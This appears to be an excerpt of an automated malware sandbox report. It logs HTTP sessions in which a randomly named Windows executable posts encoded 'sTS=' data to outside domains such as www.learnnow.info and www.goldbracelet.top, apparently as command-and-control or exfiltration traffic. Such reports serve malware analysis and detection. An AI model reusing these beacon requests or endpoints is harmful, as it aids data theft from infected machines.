                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.45002838.47.233.4804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:02.490263939 CET435OUTGET /fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:03.309673071 CET691INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.450029199.192.23.123804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:08.375169992 CET705OUTPOST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4d 46 70 38 65 73 46 47 52 76 69 51 4c 55 4f 44 4f 73 6d 70 54 42 54 39 57 7a 57 74 6a 46 78 39 52 43 51 37 46 79 44 7a 6d 66 7a 44 32 2f 75 4c 2b 71 35 63 54 5a 71 69 4b 71 64 4c 6b 39 37 70 50 74 36 66 65 6a 2f 30 70 47 36 62 77 6e 33 64 6f 2b 66 38 57 31 2f 42 51 7a 37 70 57 57 6a 63 32 76 66 34 6e 2b 4d 65 6d 34 59 4d 48 47 64 2f 6d 4e 2f 4e 52 6f 4a 31 49 71 71 32 31 32 49 63 55 6b 57 77 6b 78 6d 43 64 44 49 46 78 53 73 4f 7a 49 7a 76 35 55 6c 69 57 6a 7a 51 53 4b 7a 32 55 78 2f 2b 47 6f 61 33 65 37 41 76 64 4d 77 6b 76 66 79 37 48 41 3d 3d
                                                                                                                                      Data Ascii: sTS=unOdt6hg6b46MFp8esFGRviQLUODOsmpTBT9WzWtjFx9RCQ7FyDzmfzD2/uL+q5cTZqiKqdLk97pPt6fej/0pG6bwn3do+f8W1/BQz7pWWjc2vf4n+Mem4YMHGd/mN/NRoJ1Iqq212IcUkWwkxmCdDIFxSsOzIzv5UliWjzQSKz2Ux/+Goa3e7AvdMwkvfy7HA==
                                                                                                                                      Jan 11, 2025 09:38:08.962650061 CET533INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:08 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.450030199.192.23.123804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:10.927804947 CET725OUTPOST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4e 6b 35 38 4e 64 46 47 47 66 69 54 42 30 4f 44 62 63 6d 79 54 42 50 39 57 79 53 39 2f 6e 6c 39 55 57 63 37 4b 54 44 7a 6c 66 7a 44 76 50 75 4f 77 4b 35 4c 54 5a 57 41 4b 72 68 4c 6b 39 48 70 50 73 4b 66 65 79 2f 33 37 6d 36 46 37 48 33 66 31 4f 66 38 57 31 2f 42 51 7a 75 68 57 53 48 63 32 65 50 34 6d 62 34 64 34 6f 59 50 58 57 64 2f 69 4e 2f 4a 52 6f 4a 48 49 6f 66 54 31 77 45 63 55 6d 2b 77 6b 67 6d 4e 55 44 49 4c 2f 79 74 65 6a 64 71 61 78 30 59 33 58 79 66 73 51 4a 75 51 56 33 79 6b 58 5a 37 67 4d 37 6b 63 41 4c 35 51 69 63 50 79 63 45 55 47 43 6a 46 46 44 35 77 70 7a 34 51 52 68 6a 39 6c 37 39 49 3d
                                                                                                                                      Data Ascii: sTS=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nl9UWc7KTDzlfzDvPuOwK5LTZWAKrhLk9HpPsKfey/37m6F7H3f1Of8W1/BQzuhWSHc2eP4mb4d4oYPXWd/iN/JRoJHIofT1wEcUm+wkgmNUDIL/ytejdqax0Y3XyfsQJuQV3ykXZ7gM7kcAL5QicPycEUGCjFFD5wpz4QRhj9l79I=
                                                                                                                                      Jan 11, 2025 09:38:11.524224043 CET533INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:11 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.450031199.192.23.123804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:13.479942083 CET10807OUTPOST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4e 6b 35 38 4e 64 46 47 47 66 69 54 42 30 4f 44 62 63 6d 79 54 42 50 39 57 79 53 39 2f 6e 64 39 49 31 55 37 4c 30 58 7a 6b 66 7a 44 6e 76 75 50 77 4b 35 57 54 5a 2b 45 4b 72 73 77 6b 37 4c 70 4d 4c 69 66 4a 32 4c 33 69 57 36 46 30 6e 33 65 6f 2b 66 70 57 31 50 37 51 7a 2b 68 57 53 48 63 32 64 6e 34 68 4f 4d 64 36 6f 59 4d 48 47 63 77 6d 4e 2f 78 52 6f 52 39 49 6f 62 70 31 41 6b 63 58 47 75 77 6d 53 4f 4e 62 44 4a 74 79 53 73 62 6a 64 75 7a 78 33 73 42 58 79 62 43 51 4f 47 51 58 57 43 39 4d 34 33 50 50 34 77 52 65 72 52 75 37 76 72 7a 62 6e 70 38 54 32 6c 44 51 4e 41 35 70 49 42 56 7a 51 39 38 67 4a 37 62 6b 6f 4d 52 32 5a 75 33 33 35 51 46 43 2f 7a 61 43 77 45 51 78 69 5a 48 79 4d 79 7a 6b 47 71 78 6f 4d 68 46 50 47 4f 79 4f 38 2f 6d 7a 65 33 6b 53 2f 5a 66 30 57 74 71 2b 50 45 75 54 7a 65 4d 69 59 4b 42 57 4b 72 36 52 35 78 57 6f 49 4e 6b 53 4a 48 42 7a 48 61 53 59 57 35 4f 38 41 6d 2b 4d 63 62 54 4e 42 38 6f 68 45 31 74 7a 6a 50 4e 6c 52 49 6c 74 61 [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nd9I1U7L0XzkfzDnvuPwK5WTZ+EKrswk7LpMLifJ2L3iW6F0n3eo+fpW1P7Qz+hWSHc2dn4hOMd6oYMHGcwmN/xRoR9Iobp1AkcXGuwmSONbDJtySsbjduzx3sBXybCQOGQXWC9M43PP4wRerRu7vrzbnp8T2lDQNA5pIBVzQ98gJ7bkoMR2Zu335QFC/zaCwEQxiZHyMyzkGqxoMhFPGOyO8/mze3kS/Zf0Wtq+PEuTzeMiYKBWKr6R5xWoINkSJHBzHaSYW5O8Am+McbTNB8ohE1tzjPNlRIltaG5mgQ0rXKHSVl6JFazhKRZayapLt/oKZdQZ4HMKvdlKRJPuBlwugk9c6WaQ6wOBK1JN2TDuYquLkVmaQfGV0OHOIRi7A1Dmt3splvf+qJkUCMtQYGUW9iWS3EzMoRd3HipLkmoX25km+SC/uADqPAQQphzv6IAPjKd9OaK6guFafw6OE8WT+n+LJOzZRWSdOMABKe/J45LlGEck7Z4kUCQNDO4pq5ClXiP3ZQaGIbhTBfrnTNeORChNTA2XxikUFl/AU4Udv7c9BcdD3t8/+aqaRobMmYHwJNSRJYGBjn9SGBuBDWAwOumEWUIRGdUXH7uWeM7vnPaWDm/iTfEkViz7QyZRmjn643fmv2mcAjzsa4bApcO/1iy0da79yUXYILes/l3akXOI/kvGga3qmkG5p+irVWDeg/WzV01r2ey1NHgq+G4iUGQ1sIgo8QfkoCJKI39QK08EL5dkD3xdO1kWHLzNSkjdQGphKYctemMj5sFP75Lr1L5GdiQZemz9h0GJXdYiFLGy3o9PK63TjV4IQFG/4YwnQ66cIY34MJimz1U8ZO0KwljZfJfhaW14IM8TTuudqMybqjZ4BwI+RmFQXa9hknf57qmTtp/x0bb9vehxv4hgB1hfOIc4F+Xg/PpPwq8KBo2qCOf5hRuY0mcdNbadjoDSawu [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:38:14.130098104 CET533INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:13 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.450032199.192.23.123804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:16.016175985 CET440OUTGET /6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:16.639950037 CET548INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:16 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.450033104.21.36.239804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:21.857431889 CET714OUTPOST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 73 55 45 56 4e 31 43 30 42 78 33 4f 47 63 66 54 45 31 6f 46 77 32 45 56 78 34 34 30 46 5a 74 56 50 6c 63 76 4e 31 67 36 45 38 76 45 62 54 65 62 44 67 76 33 69 42 5a 47 76 54 76 48 76 4f 6f 43 73 42 58 47 47 2f 66 56 63 39 41 4f 6f 53 72 4a 62 58 56 78 68 31 70 37 56 71 6a 31 41 76 65 49 34 64 4e 61 45 72 31 58 47 6e 77 53 63 65 34 65 33 59 57 4c 72 66 34 41 6d 53 72 63 68 67 36 4e 57 70 59 72 73 50 58 68 47 54 79 32 70 44 48 4f 68 34 52 33 4a 33 4f 73 54 72 51 6a 41 4f 73 6e 67 6c 46 77 4c 36 34 56 71 57 41 52 5a 2f 6c 47 58 49 30 70 6c 67 3d 3d
                                                                                                                                      Data Ascii: sTS=QTR40tOSZ0kPsUEVN1C0Bx3OGcfTE1oFw2EVx440FZtVPlcvN1g6E8vEbTebDgv3iBZGvTvHvOoCsBXGG/fVc9AOoSrJbXVxh1p7Vqj1AveI4dNaEr1XGnwSce4e3YWLrf4AmSrchg6NWpYrsPXhGTy2pDHOh4R3J3OsTrQjAOsnglFwL64VqWARZ/lGXI0plg==
                                                                                                                                      Jan 11, 2025 09:38:22.331737995 CET978INHTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgAp4OZBr9WUTAx15luT7q1YLAAyI%2FwJJD7iK7jdfJrpXgPMzm%2FHkmRuffp4pw4eNlR0fIursOBn22YEY1TVLQi2DTIsw1HYs7NRtbk28sD2ZiP2l7%2F7JcAuUgGujYLEatIyJCvEfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900397151dde4285-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
